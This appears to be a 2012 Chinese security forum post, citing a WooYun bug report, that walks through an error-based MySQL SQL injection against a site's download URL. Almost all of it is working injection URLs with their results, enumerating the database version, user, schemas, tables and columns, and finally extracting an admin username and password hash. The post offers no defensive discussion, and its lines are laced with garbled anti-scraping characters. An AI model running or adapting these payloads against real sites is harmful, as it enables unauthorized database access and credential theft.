找回密码
 立即注册
查看: 2641|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
" X  H& R$ [) e3 N9 e. f" t8 f$ X' Q# `" q
之前想找个测试 没想到这有 可以测试下做个记录而已
5 e0 u: T+ q$ S( P# P- Q3 R
6 O  B" @: Z0 i2 X$ J- ~. n/ W: U3 zhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003( F! P. [6 Y/ b" ]# v) r# i' Y* T

+ F& J! l2 @1 X2 a! w/data0/htdocs/leqi_new/app/myapp.php; s4 G+ G3 L7 b% T# G& ]+ V

4 Q$ `5 O0 A' X/ R& o+ Z 或者! }, K! S9 K: s5 M" `# q2 ^$ N
' s& U& G6 B) F$ M, {6 X* ]% P8 P% q2 R. O
/**********version()**********/ 5.1.49-log  ~( E2 D! z9 T5 i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ n5 _/ D" S3 R% J% b4 i1 l; Z
4 I, }' v6 h+ [9 }. ^
/**********user()**********/  
; v' l/ Y+ H1 ^9 Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* Y3 {' ^% [/ C" _0 |1 Y  w6 K9 Q9 E! ]) W/ @
/**********database()**********/  leqi
$ H6 [% f8 \* F. ]! [; ~9 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# L* K& w/ E: o4 P1 _$ b, p

1 a* h7 b6 i. V# B- o/**********limit依次递归爆库**********/
& s# u' u8 W% m' o5 c2 ?/ M. ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! E$ g/ T4 J. Jinformation_schema
- Y/ S* a4 P. c+ N+ q+ Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 b/ X2 x/ c* r" I- P
leqi
6 k% r: D" q+ _# l3 }$ Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 I7 m6 e" k- ~) I0 }. w* `3 H7 B4 atest
: i: Z/ X1 q: n! _. M9 Z3 h  |' u" f1 l
/**********limit依次递归爆表名**********/
4 n4 e0 Z! F( Q& Z7 y% v$ l( Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 g0 ]" ]( h4 K+ ]/ |users4 B- w, N& |3 ~* A# i" q

" ~& x( J6 K3 f" g& A/**********limit依次递归爆字段名**********/
& _9 `: D! d3 J0 w  S6 D* yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! R$ X8 e- ~! r* x: Z5 P- Euser_id,username,nickname,passwd,group_id
3 k) l* L8 _0 a' m& \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%237 c1 l0 n. e- _/ S/ G! x- K# C
/wapc/5000_0005_003
  D* @' y. H/ Q11 214 G6 e$ p4 B8 I8 ~" a: u$ Y) X! y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23% n: s. I; a9 O% i/ g4 ~; Z' H
/wapc/5000_0005_003
8 v  r3 H) C: z+ G2 b6 K: t11 341 351 361, h, d4 B: z2 I: n) ]4 f$ {1 J: [
/**********爆数据**********/( }" V, m# b8 G  Q  W! z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23; S, p$ Z5 a' P9 D, O
admin
' Z+ I+ p' l/ T7 h5 ]$ vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23: @7 f9 Z( `, V, b1 u& _
6a8b4574ca231eb8bd52764d4978ffcd
8 o# p; f1 m7 M$ W% W% t! ?/ s$ m5 p4 M" V! P; K0 N
. b# X8 P0 ^& `9 M+ @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表